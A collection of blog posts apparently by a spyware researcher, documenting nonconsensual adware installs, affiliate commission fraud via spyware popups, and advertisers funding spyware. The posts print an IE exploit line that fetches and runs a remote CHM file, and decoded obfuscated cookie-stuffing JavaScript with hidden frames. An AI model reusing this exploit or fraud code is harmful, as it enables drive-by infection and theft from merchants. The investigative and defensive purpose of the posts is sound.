In its demand letters (e.g. pages 3-4 of its letter to CounterExploitation), New.net has claimed always to “provide[] very detailed download disclosures to all potential users” and to install only with users’ “explicit consent.” These are laudable goals, but they’re not just not achieved by New.net’s actual practices.

So New.net faces a product users don’t want; an Internet community that doesn’t like its core business or their installation tactics; and clear proof of its software installed without user consent. Yet paradoxically some anti-spyware vendors still don’t detect New.net or help users remove New.net software. See Eric Howes’ recent State of New.net Detections — finding that Webroot, Spyware Doctor, and Ad-Aware all fail even to detect New.net, while Microsoft recommends ignoring New.net and Spybot ignores New.net by default.

The Rest of Pacimedia’s Bundle

A 180solutions stub installer also shown during the course of the Pacimedia/New.net installation. Paradoxically, 180solutions installs even if users decline the installation in the stub. A 180solutions stub installer also shown during the course of the Pacimedia/New.net installation. Paradoxically, 180solutions installs even if users decline the installation in the stub.

New.net isn’t all that Pacimedia installs. In my testing, I saw programs installed from ConsumerAlertSystem, ContextPlus, eXact Advertising, Integrated Search Technologies, MediaAccess, Powerscan, SearchAccuracy, ShopAtHomeSelect, Sidefind, SurfSidekick, and YourSiteBar. All are shown in my installation video.

Pacimedia also installed 180 — despite my specific refusal to grant consent when asked. In the video at 7:09, 180 showed a stub installer popup, seeking user consent to install. (See screenshot at right.) I specifically declined 180’s offer. But a mere twelve minutes later, in the video at 19:18, a full copy of 180solutions nonetheless arrived on my test PC. So much for 180’s vaunted new “safe and secure” installation methods: Despite 180’s claims, it’s clear that their software still arrives without consent.

My video also shows the detrimental effects of these many added programs on my test machine: Midway through testing, I couldn’t even load Internet Explorer. Typical users would find it difficult to recover from such a large installation — their computers too badly encumbered even to download an anti-spyware program to begin to clean up the mess.

Though Pacimedia’s installation bundle changes over time, it’s striking how long Pacimedia has continued practices substantially matching what I saw this week. In testing of April 4, 2005, I received the same exploit and same dialog box shown above — even the same false claim that “you agree to the terms and conditions stated here,” with no conditions actually stated. Throughout this period, Pacimedia has received traffic through major ad networks (Yieldmanager.com, as well as Targetnet.com from Mamma Media (Nasdaq: MAMA)), has installed adware from large vendors including 180 and eXact (along with others, often including Direct Revenue), and has simultaneously shown a misleading ActiveX (see separate write-up). It’s hard to defend any of these practices. Yet somehow Pacimedia has continued apace for 6+ months.

For those interested in the technical details of Pacimedia’s security exploit: Pacimedia serves up a page with two IFRAMEs, one of them a reference to a doubly-encoded JavaScript (JScript.Encode followed by Unicode encoding). After decoding, inspection of that page reveals its use of an IE security vulnerability (discovered March 2004), allowing the execution of arbitrary code on a user’s PC. In particular, Pacimedia’s second IFRAME references a CHM, via syntax msits:mhtml:file://C:foo.mht!http://www.pacimedia.com/track//TRACK31.CHM::/track31.htm — telling IE to load the MHT file (Microsoft “web archive” format) at cfoo.mht, but if that file doesn’t exist (as it predictably does not), then to load www.pacimedia.com/track/track31.chm instead. (.CHM is a compiled help file, a format used by recent Windows help.) IE follows these instructions — ultimately loading and running the code within track31.chm. In this way, Pacimedia’s code obtains full control over users’ computers, despite users never granting consent. This vulnerability was cured in Microsoft patches posted in 2004, but empirical analysis of infected PCs shows that many PCs remain unpatched and vulnerable.

How Affiliate Programs Fund Spyware updated September 15, 2005

Affiliate networks offer an appealing promise for supporting free, independent content on the web: Any ordinary user can sign up to promote any interested merchant via a special affiliate tracking link. When a user clicks the link and makes a purchase from the merchant, the referring web site (“affiliate”) gets a payment from the merchant. Since merchants only pay affiliates when users actually make purchases, merchants feel free to partner with smaller affiliate sites — sites that might otherwise be too small or quirky to get advertisers’ attention. See one merchant’s diagram of the canonical affiliate relationship.

Despite the promise of affiliate marketing, haphazard marketing arrangements entail serious risks. If merchants sign up affiliates without investigation or monitoring, merchants risk accepting partners with undesirable business practices. Consider an affiliate who sends spam, or whose site is so controversial that no reasonable merchant would want to be seen there. So, experienced merchants have learned, they must monitor their affiliates for these kinds of dubious behaviors.

    Affiliate Merchants    
(i.e. Dell, Gateway, eLuxury, J&R)    
money viewers
Affiliate Networks
(i.e. LinkShare, Commission Junction)
money viewers
Affiliates
money viewers
Spyware Vendors
(i.e. 180solutions, Direct Revenue, eXact Advertising)

The money trail – how funds flow from merchants to affiliate networks to affiliates to spyware vendors.

Even more serious for most merchants, some affiliates promote merchants via unwanted advertising software — “spyware.” Some affiliates cause merchants’ ads to cover competitors’ sites — a merchant’s ad might appear through spyware without the merchant knowing about, intending, or requesting this result. Worse, affiliates can use spyware to steal commissions they haven’t earned — making tracking systems think users arrived at a merchant’s site via an affiliate link, when users actually just typed in a merchant’s domain name (such that no commission should be paid).

Because any affiliate can pay a spyware vendor to open the affiiliate’s links in spyware-delivered popups, catching these affiliates is not a trivial task. Enforcement cannot merely examine on affiliates’ names or stated practices: Affiliates’ names will not generally match the names of known “adware” vendors, and rogue affiliates are unlikely to describe their practices truthfully in their affiliate network applications. Instead, enforcement must entail actual examination of affiliates’ behavior — examination that most merchants and networks appear ill-equipped to perform.

There have been numerous reports of affiliates buying traffic from spyware — reports on my site (1, 2, 3, 4, 5) and elsewhere (1, 2, 3, 4). But to date, affiliate networks have failed to make substantial progress at stopping affiliate-spyware scams: These practices continue, affecting merchants with all major affiliate networks.

This piece proceeds in three parts. First, I show five specific examples of particular affiliates currently employing spyware to claim affiliate commissions, in apparent violation of applicable rules. (1, 2, 3, 4, 5) Second, I offer recommendations to concerned merchants. I conclude with recommendations for networks — suggesting technology and policy to stop this problem in the long run.

Example: Unknown Commission Junction Affiliate Targeting Dell with Gateway Popunders via Direct Revenue

A popunder promoting Gateway, purchased from Direct Revenue by a rogue affiliate. If a user ultimately makes a purchase from Gateway, the popunder causes Gateway to pay commissions to the affiliate, via Commission Junction. Gateway pays these commissions even though it did not know of or approve the affiliate's decision to place advertising with Direct Revenue. A popunder promoting Gateway, purchased from Direct Revenue by a rogue affiliate. If a user ultimately makes a purchase from Gateway, the popunder causes Gateway to pay commissions to the affiliate, via Commission Junction. Gateway pays these commissions even though it did not know of or approve the affiliate’s decision to place advertising with Direct Revenue.

When users visit Dell.com on PCs infected with Direct Revenue, users may receive Gateway popunders. See screenshot at right, showing the Gateway popunder in a window marked Aurora (a Direct Revenue product name).

This advertising for Gateway does not occur because Gateway has requested that Direct Revenue advertise Gateway when users visit Dell’s site. Rather, a Gateway affiliate has purchased these ads. If a user subsequently makes a purchase from Gateway, the affiliate gets a commission, and these commissions let the affiliate pay Direct Revenue for showing the ad in the first place.

The ad at right is loaded via the following excerpted DirectRevenue targeting code (as recorded by my network monitor / packet sniffer). Yellow highlighting marks the targeting (to dell.com), while red highlighting marks the affiliate ID number and green highlighting marks the command to open the popunder. Extraneous code is omitted for brevity.

GET /imp/servlet/ImpServe?urlContext=http%3A%2F%2Fwww.dell.com%2F&domainContext=dell.com … HTTP/1.1

Host: xadsj.offeroptimizer.com …
 
HTTP/1.1 200 OK…
<BODY>
<title>—</title>
<SCRIPT LANGUAGE=”JavaScript”>

url=”http://service.bfast.com/bfast/click?bfmid=37919389&siteid=41294023 &bfpage=bf_advanced&bfurl=http%3A%2F%2Fwww.gateway.com%2Fhome”;

winad=window.open(url, “_blank”, attrib);

This action by the Gateway affiliate violates multiple Commission Junction policies: Direct Revenue software sometimes installs invisibly and without consent. Direct Revenue-delivered affiliate popups constitute forced clicks, invoking affiliate links without any affirmative end user action. The affiliate at issue is buying traffic from adware it did not design and does not control. The affiliate’s behavior also serves to overwrite cookies set by other affiliates, reducing others’ commissions. Each of these behaviors violates CJ’s Publisher Code of Conduct.

Example: Unknown Commission Junction Affiliate Targeting Dell via Direct Revenue

A popunder of Dell, purchased by a rogue affiliate and delivered via Direct A popunder of Dell, purchased by a rogue affiliate and delivered via Direct Revenue as a user browses Dell.com. If a user ultimately makes a purchase from Dell, the popunder causes Dell to pay commission to the affiliate, via Commission Junction. So Dell ends up paying affiliate commissions even when users have requested its site specifically and by name — a situation that would not otherwise entail paying affiliate commission.

When users visit Dell.com on PCs infected with Direct Revenue, users may receive Dell popunders. See screenshot at right, showing such a popunder.

Here again, a rogue affiliate has placed ads through spyware — again without the merchant’s knowledge or approval. But notice the difference: In the Gateway example (above), the popup ad promoted a competitor of the site the user requested, whereas here the ad promotes the same site the user had already requested. What’s going on? Targeting Dell with Dell’s own affiliate link reveals an affiliate’s understanding that a user at Dell.com would probably most prefer to purchase from Dell, not Gateway. So the affiliate opens a Dell affiliate link — setting cookies such that if the user ultimately does purchase from Dell, the affiliate will get a commission. But the affiliate did nothing to facilitate the purchase or to fairly earn a commission; the users was already at Dell.com! Beyond cheating Dell, this affiliate also violated the CJ Publisher Code of Conduct for the reasons set out in the prior example.

Direct Revenue targeting code follows. Yellow highlighting marks the targeting (to dell.com), while red highlighting marks the affiliate ID number and green highlighting marks the command to open the popunder.

GET /imp/servlet/ImpServe?urlContext=http%3A%2F%2Fwww.dell.com%2Fcontent%2Fdefault.aspx%3Fc%3Dus%26cs%3D19%26l%3Den%26s%3Ddhs&domainContext=dell.com … HTTP/1.1

Host: xadsj.offeroptimizer.com

 
HTTP/1.1 200 OK

<BODY>
<title>—</title>
<SCRIPT LANGUAGE=”JavaScript”>

url=”http://service.bfast.com/bfast/click?bfmid=37628499&siteid=41115962&bfpage=banner1″;

winad=window.open(url, “_blank”, attrib);

Example: Unknown LinkShare Affiliate Targeting eLuxury via 180solutions

A popunder of Dell, purchased by a rogue affiliate and delivered via Direct A ‘double’ popup of eLuxury.com, purchased by a rogue affiliate and delivered via 180solutions as a user browses eLuxury. The popup claims commissions from eLuxury, via LinkShare, if a user ultimately makes a purchase from eLuxury. So eLuxury ends up paying affiliate commissions even when users have requested its site specifically and by name — a situation that would not otherwise entail paying affiliate commission.

When users visit eLuxury.com on PCs infected with 180solutions, users may receive popunders of the eLuxury site as reached through affiliate links. See screenshot at right, showing such a popup. Notice the resulting duplicate entries in the status bar (flagged at A), the creation of LinkShare cookies (B), and the second window just barely visible behind the new popup (C). (The usual 180solutions branding (in the browser title bar) was erased in the course of the LinkShare redirect.) See also a video of this popup, which presents the duplicate window particularly clearly.

As in the preceding examples, this affiliate has purchased ads through spyware — targeting the merchant’s web site with its own affiliate links. If a user browses to eLuxury on an infected computer, receives this popup, and makes a purchase, tracking systems at eLuxury and LinkShare will indicate that the affiliate has earned a commission — though in fact the affiliate did nothing to facilitate the purchase.

This affiliate’s actions entail multiple violations of the LinkShare Shopping Technologies Addendum (PDF). The affiliate has altered the user’s access, view, and usage of the merchant’s site, in violation of requirement 1.(i). The affiliate has purchased network traffic keyed to particular keywords in users’ requests, in violation of provision 6.5.(ii). Furthermore, 180solutions can trigger on traffic originating with other affiliates, thereby reducing their commissions in violation of 1.(ii).

180solutions targeting code follows, as observed via my network monitor. Yellow highlighting marks the targeting (to dell.com), while red highlighting marks the affiliate ID number.

POST /showme.aspx?keyword=eluxury&…

Host: tv.180solutions.com

 
HTTP/1.1 200 OK

<HTML>

ad_url: <input id=ad_url name=ad_url value=http://click.linksynergy.com/fs-bin/click?id=DSOXp2QDjbg&amp;offerid=31266.10000067&amp;type=4&amp;subid=0>

Example: MyGeek (LinkShare Affiliate) Targeting J&R via Direct Revenue

A popunder of J&R, purchased by MyGeek and delivered via Direct Revenue as a user browses jr.com. If a user ultimately makes a purchase from J&R, the popunder causes J&R to pay commission to the affiliate, via LinkShare. So J&R ends up paying affiliate commissions even when users have requested its site specifically and by name -- a situation that would not otherwise entail paying affiliate commission. A popunder of J&R, purchased by MyGeek and delivered via Direct Revenue as a user browses jr.com. If a user ultimately makes a purchase from J&R, the popunder causes J&R to pay commission to the affiliate, via LinkShare. So J&R ends up paying affiliate commissions even when users have requested its site specifically and by name — a situation that would not otherwise entail paying affiliate commission.

When users visit jr.com on PCs infected with Direct Revenue, users may receive J&R popunders. See screenshot at right, showing such a popunder.

Like the examples above, the popunder here is a popunder of the merchant’s own affiliate link — designed to claim affiliate commission from purchases that would have occurred even without the popunder. But here the popunder targeting is routed through an intermediary, MyGeek. Direct Revenue targeting code reveals what is occurring: First Direct Revenue opens a popunder (green highlighting) of a MyGeek URL (blue) (referencing MyGeek via IP address 66.179.234.169, which Whois confirms is indeed a MyGeek host). Then MyGeek redirects to LinkShare (red).

GET /a/Drk.syn?adcontext=http://www.jr.com/images/cart/btn_proceed_to_scheckout.gif& … HTTP/1.1

Host: btg.btgrab.com

 
HTTP/1.1 200 OK

adurl=http://66.179.234.169/cpv.jsp?s=7453&c=53491&p=110077&adultfilter=on&aid=586& …

 
 
GET /cpv.jsp?s=7453&c=53491&p=110077&adultfilter=on&aid=586& …

Host: 66.179.234.169

 
HTTP/1.1 302 Found

Location: http://click.linksynergy.com/fs-bin/stat?id=OAfBJvRKlyk&offerid=58654

That MyGeek performs such targeting is not entirely unknown. See a recent discussion at ABestWeb, with multiple participants reporting such observations. See also a cached MyGeek page (Google Cache copy, local copy) disclosing 180solusions and “OfferOptimizer” (Direct Revenue) as syndication partners. Nonetheless, MyGeek’s use of LinkShare affiliate links seems to entail multiple violations of LinkShare rules, exactly as set out in the preceding section.

Example: Wholesalingonline (LinkShare Affiliate) Targeting Hickory Farms via eXact Advertising

A popunder of Wholesalingonline.com, delivered by eXact Advertising's BullsEye as a user browses hickoryfarms.com. The Wholesalingonline popunder uses tricky cookie-stuffing methods to set Hickoryfarms cookies automatically. So if a user ultimately makes a purchase from Hickory Farms, the popunder causes Hickory Farms to pay commission to Wholesalingonline, via LinkShare. So Hickory Farms ends up paying affiliate commissions even when users have requested its site specifically and by name -- a situation that would not otherwise entail paying affiliate commission. A popunder of Wholesalingonline.com, delivered by eXact Advertising’s BullsEye as a user browses hickoryfarms.com. The Wholesalingonline popunder uses tricky cookie-stuffing methods to set Hickoryfarms cookies automatically. So if a user ultimately makes a purchase from Hickory Farms, the popunder causes Hickory Farms to pay commission to Wholesalingonline, via LinkShare. So Hickory Farms ends up paying affiliate commissions even when users have requested its site specifically and by name — a situation that would not otherwise entail paying affiliate commission.

When users visit hickoryfarms.com on PCs infected with eXact Advertising, users may receive Wholesalingonline.com popunders. See screenshot at right, showing such a popunder.

At first glance, the Wholesalingonline popunder looks innocuous — just a random web site hoping to reach visitors who requested Hickory Farms. But the Wholesalingonline page at issue is specifically designed to set Hickory Farms affiliate cookies, despite the lack of any visible Hickory Farms content within the site. (For background on such practices, see my cookie-stuffing page, reporting dozens of such examples, all occurring without the use of spyware or adware.)

The Wholesalingonline page at issue sets cookies in the following way: First, Wholesalingonline delivers a page of encoded gibberish JavaScript, instructing use of the JavaScript “unescape” command to recover JavaScript code from hex-encoded ASCII. A snipped of the encoded original:

<HTML><HEAD><TITLE>Cut Out the Middle Man with Warehousing Direct</TITLE><SCRIPT type=”text/javascript”><!–
document.write(unescape(“%3C%53%43%52%49%50%54%20%74%79%70%65%3D%22%74%65%78%74%2F%6A …

Decoding this block of code yields the following secondary decoder function, “q()”

<SCRIPT type=”text/javascript”><!– function q(s){var o=””,a=new Array(),w=””,e=0;for(i=0;i<s.length;i++){c=s.charCodeAt(i);c=c^30;w+=String.fromCharCode(c);if(w.length>80){a[e++]=w;w=””}}o=a.join(“”)+w;return o}//–></SCRIPT>

Using the q() function to decode the remainder of the page yields the following HTML contents:

<frameset rows=”0,100%” onLoad=”top.mainFrame.location=’http://www.wholesalingonline.com’ …>
<frame src=”http://208.55.59.48/41128/268749.htm” …>
<frame src=”about:blank” …>

Notice that the page creates a frameset with two rows. The first, suspiciously set to be invisible (0 pixels in height), loads content from a server at 208.55.59.48. The second, the only visible frame, loads the wholesalingonline.com home page.

Sure enough, my packet sniffer confirms that the 208.55.59.48 page was indeed loaded immediately thereafter. That page offers an extremely lengthy (88KB) encoded JavaScript of its own, but decoding reveals the cookie-stuffing code copied below. Yellow highlighting flags the creation of an array of LinkShare affiliate links (IDs in red). Green highlighting flags random selection of a one of the affiliate links (chosen based on the current time). Finally, an IFRAME (blue) embeds the affiliate link within the page — thereby invoking the affiliate link and setting cookies accordingly.

link = new initArray(
“http://click.linksynergy.com/fs-bin/click?id=7o6JnHbjuWM&offerid=6562.10000190&type=3&subid=0″,
“http://click.linksynergy.com/fs-bin/click?id=7o6JnHbjuWM&offerid=6562.10000190&type=3&subid=0″,
“http://click.linksynergy.com/fs-bin/click?id=7o6JnHbjuWM&offerid=6562.10000171&type=3&subid=0″,
“http://click.linksynergy.com/fs-bin/click?id=7o6JnHbjuWM&offerid=6562.10000148&type=3&subid=0″,
“http://click.linksynergy.com/fs-bin/click?id=7o6currJnHbjuWM&offerid=6562.10000036&type=3&subid=0″,
“http://click.linksynergy.com/fs-bin/click?id=7o6JnHbjuWM&offerid=6562.10000190&type=3&subid=0″
);
 
var currentdate = new Date();
var core = currentdate.getSeconds() % link.length;
var ranlink = link[core];
 
document.write(‘<DIV align=center><IFRAME SRC=”‘ +ranlink+ ‘” WIDTH=0 HEIGHT=0 FRAMEBORDER=0 scrolling=”no”></IFRAME></a></DIV>’);

Examination of my packet log confirms that a LinkShare affiliate link was ultimately invoked in exactly the way that this code specifies. Notice HTTP Referer header, bearing the suspect 208.55.59.48 referring URL identified above (green).

GET /fs-bin/click?id=7o6JnHbjuWM&offerid=6562.10000036&type=3&subid=0 HTTP/1.1

Referer: http://208.55.59.48/41128/268749.htm

Wholesalingonline’s methods are clearly more sophisticated than the other affiliates shown above; the multiple levels of encoding, obfuscation, framesets, randomization, and other trickery reveal Wholesalingonline’s desire not to get caught. But ultimately Wholesalingonline’s strategy is identical to the others: To make a merchant’s tracking system think that a user arrived at a merchant through its affiliate tracking link, such that a commission should be paid, when in fact no such commission is in order.

Additional Examples

I have been documenting examples of this behavior since spring 2004, and I have literally hundreds of examples on file, reflecting targeting of most major affiliate merchants. The examples above happen to focus on targeting using notorious advertising software from Direct Revenue, 180solutions, and eXact Advertising, but similar targeting remains widespread using pop-ups from ContextPlus, Kvmedia, and numerous others.

What Merchants Should Do

The commissions at issue are ultimately paid by merchants. Sophisticated, dedicated merchants can detect these fraudulent claims — and refuse to pay the commissions at issue.

Some merchants look to networks to identify and block improper affiliate actions. But as shown in the examples above and as discussed below, networks have failed to address this problem. In addition, independent merchants (those who recruit affiliates directly, without using an afiliate network) have no network to assist them in fraud prevention — meaning they’re all the more vulnerable to rogue affiliates.

As a first step in preventing affiliates from buying traffic from spyware vendors, merchants should specifically prohibit this practice, via new provisions in their affiliate terms & conditions. Merchants should also examine the affiliates who apply to their affiliate programs. But even careful screening of affiliates’ applications and sites can’t detect all rogue affiliates; some affiliates are entirely legitimate but for their use of spyware. Where an affiliate combines a legitimate affiliate web site with additional traffic purchased from a spyware vendor, mere examination of the affiliate’s web site will not reveal the spyware traffic.

Some merchants seek out rogue affiliates by looking for transactions with missing HTTP Referer headers. When a user clicks from one web site to another, the second server generally receives the URL of the originating page on the first server — the “HTTP Referer.” But when a page is loaded by spyware, i.e. as an unrequested popup, the referrer field is blank. So affiliates with blank refererrs often turn out to be getting traffic from popups rather than from bona fide clicks within affiliates’ web pages. (That said, this method is imperfect too: Some popups submit fake referrer header data.)

These days, savvy merchants conduct testing of various spyware programs to identify rogue affiliates. It’s remarkably cheap to buy a few spare machines and infect them with a mix of spyware. For best results, merchants need to add packet sniffers or other detailed network logging, and all infected machines should be kept outside the corporate firewall. But with this equipment on hand, finding spyware-driven affiliates can require only a bit of browsing.

Other merchants hire outsiders to do this work. I provide this service to a few merchants, but there are plenty of other choices too. Some merchants even offer bounties (example: provision 3.b) to those who detect and report affiliates buying spyware traffic.

What Networks Should Do

Affiliate networks frequently boast of the quality of their affiliates. Commission Junction claims to “continually screen the network” for rogue affiliates, and to “monitor … all activity for signs of non-compliant client activity.” LinkShare claims that its network features “appropriate” affiliates. But in fact affiliate networks are plagued by affiliates whose practices defraud merchants rather than benefit them. Furthermore, despite their claims of quality, networks could do far more to eliminate rogue affiliates.

Stopping affiliates’ use of spyware must begin with comprehensive testing. In hands-on testing in my lab, I have documented literally hundreds of rogue affiliates — often dozens of different such affiliates in a single week. (See the examples above, as well as ten examples I posted during summer 2004.)

Beyond hands-on testing, efficient compliance requires special software to identify rogue affiliates automatically. I wrote such software earlier this year, and when I run this software against major adware programs, I often uncover dozens or scores of new rogue affiliates. In May, I posted summary results — analyzing 157,083 pop-up ads then shown by 180solutions, and finding that 686 claimed commissions via Commission Junction. (Others claimed commission via LinkShare, Performics, and numerous smaller or independent affiliate programs.) With automated testing methods now available, affiliate networks cannot credibly claim that large-scale testing is impractically difficult or unreasonably time-consuming.

It’s hard to know what testing methods affiliate networks actually use to conduct their testing: Networks usually treat their testing methods as confidential, either for competitive reasons or to avoid assisting would-be fraudsters. I sense that networks do do some hands-on testing, but their efforts may be less than merchants hope (especially given the size of networks’ fees). I don’t hear talk of affiliate networks running any automated testing of spyware programs. In any event, the scope of the spyware-affiliate problem reflects networks’ failure to resolve this issue: If networks were predictably catching affiliates who buy traffic from spyware, and if networks were predictably canceling any commissions claimed via such methods, scores of affiliates wouldn’t be continuing to attempt these methods.

Affiliate networks also need to impose tough penalties on those affiliates caught breaking the rules. For one, networks should take action promptly, not allow further commissions to be paid. But it’s not enough just to cancel current commissions: If breaking the rules yields only a slap on the wrist, then affiliates will continue the spyware assault, earning large profits until they’re ultimately caught. Instead, affiliate networks should get tough on spyware — demand repayment of commissions previously paid, to eliminate affiliates’ incentive to attempt to buy spyware traffic.

The more affiliate merchants pay out in commission, the larger merchants’ fees to affiliate networks. So networks have a clear incentive to look the other way, allowing spyware fraud to continue, with merchants paying the bill. But networks should not overplay their hand. It is at best unseemly for networks to profit when merchants are defrauded by rogue affiliates. Furthermore, the perception of spyware fraud in leading affiliate networks has created an opportunity for spyware and adware-free networks — Kowabunga, ShareASale, and others, as well as newcomer MPORT (which recently launched its network with the promise of blocking adware).

Last week’s announcement of LinkShare’s acquisition by Japanese portal Rakuten recalls the underlying promise of affiliate marketing. There is real value in affiliate relationships, and Rakuten certainly doesn’t intend to pay $425 million for a share in the spyware business. But does Rakuten understand the extent to which LinkShare funds payments to vendors who install advertising software without users’ consent? The extent to which LinkShare has failed to put a check on these behaviors? I’m not sure. Rakuten should demand better — and so should the merchants who ultimately pay for this mess.

How Expedia Funds Spyware

Unwanted advertising programs — typically called spyware — are funded by thousands of the world’s largest companies and most respected advertisers. Ask most of these advertisers about their support for spyware, and they’ll say they didn’t know. After all, their affiliates might have bought the ads. Their outsourced advertising placement firms might have made the decisions. Or pay-per-click search engines (including Google and Yahoo) might have syndicated their ads to spyware vendors, without advertisers’ knowledge or consent. (Details: Google, Yahoo)

But a few advertisers have the gall to defend advertising through spyware. Earlier this year, the Associated Press asked Expedia about its support for spyware. Expedia’s spokesman responded:

“It is just a marketing tool that we use.”

Expedia subsequently claimed to have “rigorous standards” for advertising software, including “mak[ing] sure customers want [the] ads.”

Despite Expedia’s claims of user consent, Expedia advertises with numerous programs that don’t get user consent at all.

Expedia Supports 180solutions, Direct Revenue, and eXact Advertising

The screenshots below show Expedia ads shown by the vendors listed at right. Below each vendor’s name are potentially-objectionable practices of that vendor — practices observed currently or in recent months. In each instance, practices include installation through security holes, with no notice or consent.

All ads were observed in September 2005. Click an ad to see a full-size screenshot with additional commentary.

An Expedia popup shown by 180solutions when I  browsed to aa.com.  

180solutions (Zango / 180search Assistant)

An Expedia popunder shown by Direct Revenue when I browsed to jetblue.com.  Shown after activation of the popunder.

Direct Revenue (Aurora, Ceres, etc.)

An Expedia popunder shown by eXact Advertising when I browsed to jetblue.com.  Shown after activation of the popunder.

eXact Advertising (BullsEye)

Intermediaries Placing and Tracking Expedia’s Spyware Ads

Comments from Expedia staff indicate that Expedia is aware of its relationships with “adware” vendors. Nonetheless, advertising intermediaries help facilitate, track, and fund these relationships. Users may therefore place some blame on advertising intermediaries.

In my May analysis of intermediaries helping to fund spyware, I offered as an example an Expedia ad served by 180solutions via aQuantive’s Atlas Solutions.

Other Expedia ads flow through other intermediaries, although each of the ads shown above ultimately reaches Expedia via Atlas Solutions. For example, the ad shown by eXact also passes through Xctrk.com (SearchBoss) and 24/7 Real Media before reaching Atlas.

Although spyware traffic reaches Expedia through advertising intermediaries, Expedia’s servers receive detailed information about the sources of newly-arrived users referred through spyware advertising. For example, see the partial screenshot below, showing an Expedia popup delivered by 180solutions, covering American Airlines at aa.com. Notice that the URL to Expedia includes the string “metdr” in the URL bar. “Metdr” is an abbreviation for MetricsDirect, 180’s advertising sales unit. The presence of this text in Expedia’s URL indicates Expedia’s specific knowledge that the ad is coming from 180solutions. Under these circumstances, Expedia cannot claim to be unaware that it is supporting 180solutions. My full ad screenshots present similar tracking codes in Expedia’s ads as shown by other spyware vendors.

What Expedia Should Do

While Expedia continues advertising with notorious spyware vendors, other major advertisers have ceased relationships with such vendors and publicly voiced their disapproval of these vendors’ practices. In June 2004, Major League Baseball announced (paid registration required)) that it won’t work with companies who use spyware — specifically mentioning unwanted advertisements as a negative consequence of spyware, and thereby seeking to implicate the various vendors Expedia supports. Verizon also said it would cease advertising through what it called “adware.” Wells Fargo staff wrote an op-ed criticizing spyware, noting negative effects of unwanted advertising software on PC reliability as well as on web site integrity. More recently, Netflix announced its intention to cease such advertising (though in my testing, some Netflix ads are still distributed through the vendors listed above, often intermediated through Netflix’s affiliate program).

Expedia’s recent comments to the Associated Press propose an appropriate initial standard — that ads shouldn’t be shown to users through advertising software users didn’t agree to install. But if Expedia aspires to enforce this standard, it needs to better examine how advertising software actually becomes installed. As indicated by the many links above, spyware researchers have uncovered numerous nonconsensual installations of the very programs Expedia currently supports. Expedia staff should review industry sources and perhaps even conduct hands-on tests of their own, to make sure the vendors Expedia supports are not vendors that install without consent or otherwise engage in undesired practices.

These lessons also apply to other large travel sites. In my testing, travel ads appear particularly frequently through spyware, and in the course of recent testing, I received spyware-delivered ads promoting Cheaptickets, Hotels.com, Hotwire, Orbitz, Priceline, and Travelocity. In many instances, these vendors hire spyware to target each other — e.g. Travelocity might buy ads that cover Priceline’s site, but once a user reaches Travelocity, a new Priceline pop-up ad will pull the consumer right back. These many spyware-delivered ads entail large payments from travel services (and ultimately the consumers who fund them) to spyware vendors. The online travel industry would surely be better off if all firms agreed to cease this aggressive spyware-delivered advertising. By reducing funding of spyware, such an agreement would offer substantial benefits to consumers too.

How Yahoo Funds Spyware updated September 5, 2005

Yahoo’s Overture (recently renamed Yahoo Search Marketing) allocates pay-per-click (PPC) ads among Yahoo’s network of advertisers. When users run searches at yahoo.com, Yahoo’s advertisers are assigned placements at the top, right, and bottom of search results. Advertisers pay Yahoo a fee when users click on their ads.

But Yahoo doesn’t just show advertisers’ ads on yahoo.com; Yahoo also distributes advertisers’ ads to Yahoo’s various syndication partners. Many of these partners are entirely legitimate: For example, most advertisers will be happy to show their ads to users running searches at washingtonpost.com, where Yahoo sponsored links complement searches of Post articles.

However, serious concerns arise where Yahoo syndicates advertisers’ ads to be shown by advertising software installed on users’ PCs — software typically known as spyware or adware. In my testing, Yahoo’s funding of spyware is widespread and prevalent — an important source of revenue for many spyware programs installed on millions of users’ PCs. Were it not for Yahoo’s funding of these programs, the programs would be far less profitable — and there would be fewer such programs trying to sneak onto users’ PCs.

Yahoo’s funding of spyware is not unique. I’ve recently written about Google’s funding of similar bad actors (1, 2). Earlier this year, FindWhat disclosed related problems, admitting that terminating its dubious distributors would reduce revenues by at least 5%. But in my hands-on testing of various spyware-infected PCs, I find that I receive Yahoo-syndicated ads more frequently than I receive such ads from any other single PPC network.

This article proceeds in three parts. First, I show examples of Yahoo ads supporting Claria, eXact Advertising, Direct Revenue, 180solutions, and various others; I also review the objectionable practices of each of these vendors. (Numerous additional examples on file.) Second, I review Yahoo’s disclosures to advertisers — finding that Yahoo has failed to tell advertisers about its controversial syndication partners, even in general terms. I conclude with recommendations to Yahoo (and other PPC search engines that allow syndication), as to how to put an end to this mess and avoid such problems in the future.

Claria (Gator / GAIN): SearchScout Popunders of Yahoo Sponsored Links

A Yahoo Overture popunder, delivered by Claria, targeting a Google search for the same phrase.  Shown after activating the popunder. A Yahoo Overture popunder, delivered by Claria, targeting a Google search for the same phrase. Shown after activating the popunder.

A Yahoo Overture popunder, delivered by Claria, showing sponsored results for A Yahoo Overture popunder, delivered by Claria, showing sponsored results for “computer” when users visit Dell.com. Shown after activating the popunder and right-clicking the ad to show its destination.

    PPC advertisers (i.e. Dell)    
money viewers
Yahoo Overture
money viewers
Claria (Gator / GAIN)

The money trail – how funds flow from advertisers to Yahoo Overture to Claria.

Likely Yahoo’s largest single advertising software syndicator, Claria shows Yahoo Overture pay-per-click ads in popunders triggered by users’ web browsing.

Before showing Yahoo ads, Claria software must first become installed on users’ computers. Claria’s installation often proceeds without meaningful user consent. For example, Claria often gets installed through software bundles — where a user seeks one program but gets Claria too. Historically, Claria’s bundles have featured lengthy license agreements (as long as 5,900+ words and 63 on-screen pages), broken license formatting (missing line breaks, making section headings hard to find), and substantively unreasonable terms (including restrictions on how users can remove Claria software). Claria also promotes its software through banner ads — including ads on kids sites, claiming to fix computer clocks or improve computer security, showing a license only after installation has begun and cannot be cancelled. Some Claria uninstallers don’t work — leading users in circles rather than actually removing Claria software.

Claria’s core business is showing pop-up ads specifically purchased by advertisers. (See my 2003 listings, including well-known advertisers. See also PC Pitstop listing based on Claria 2003 disclosures.) But Claria also shows popunders of Yahoo Overture sponsored links. Search for “computer repair” at any major search engine, and Claria adds a popunder giving Yahoo Overture ads for that same term. Sponsored link popunders also target specific web sites. Visiting Dell often yields a Claria popunder of Yahoo Overture ads for “computer.”

